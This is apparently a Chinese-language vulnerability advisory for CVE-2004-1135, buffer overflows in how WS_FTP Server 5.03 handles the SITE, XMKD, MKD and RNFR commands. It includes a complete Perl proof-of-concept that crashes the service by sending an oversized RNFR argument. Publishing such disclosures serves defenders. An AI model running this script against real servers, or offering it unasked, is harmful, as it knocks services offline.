安全研究

安全漏洞
WS_FTP Server多个命令处理缓冲区溢出漏洞

发布日期:2004-11-29
更新日期:2004-11-30

受影响系统:
Ipswitch WS FTP Server 5.03
描述:
BUGTRAQ  ID: 11772
CVE ID: CVE-2004-1135

WS_FTP Server是一款FTP服务程序。

WS_FTP Server多个命令处理存在缓冲区溢出问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。

程序对SITE、XMKD、MKD和RNFR命令参数的处理缺少正确的缓冲区边界检查,精心构建提交参数可能以进程权限在系统上执行任意指令。

<*来源:Reed Arvin (reedarvin@gmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110177654524819&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Reed Arvin (reedarvin@gmail.com)提供了如下测试方法:

#===== Start WS_FTP_Overflow.pl =====
#
# Usage: WS_FTP_Overflow.pl <ip> <ftp user> <ftp pass>
#        WS_FTP_Overflow.pl 127.0.0.1 hello moto
#
# WS_FTP Server Version 5.03, 2004.10.14
#
# Download:
# http://www.ipswitch.com/
#
#####################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                    PeerPort => "21",
                    Proto    => "TCP"))
{
    print "Attempting to kill WS_FTP Server service at $ARGV[0]:21...";

    sleep(1);

    print $socket "USER $ARGV[1]\r\n";

    sleep(1);

    print $socket "PASS $ARGV[2]\r\n";

    sleep(1);

    print $socket "PORT 127,0,0,1,18,12\r\n";

    sleep(1);

    print $socket "RNFR " . "A" x 768 . "\r\n";

    close($socket);

    sleep(1);

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                        PeerPort => "21",
                        Proto    => "TCP"))
    {
        close($socket);

        print "failed!\n";
    }
    else
    {
        print "successful!\n";
    }
}
else
{
    print "Cannot connect to $ARGV[0]:21\n";
}
#===== End WS_FTP_Overflow.pl =====

建议:
厂商补丁:

Ipswitch
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ipswitch.com/

浏览次数:4585
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障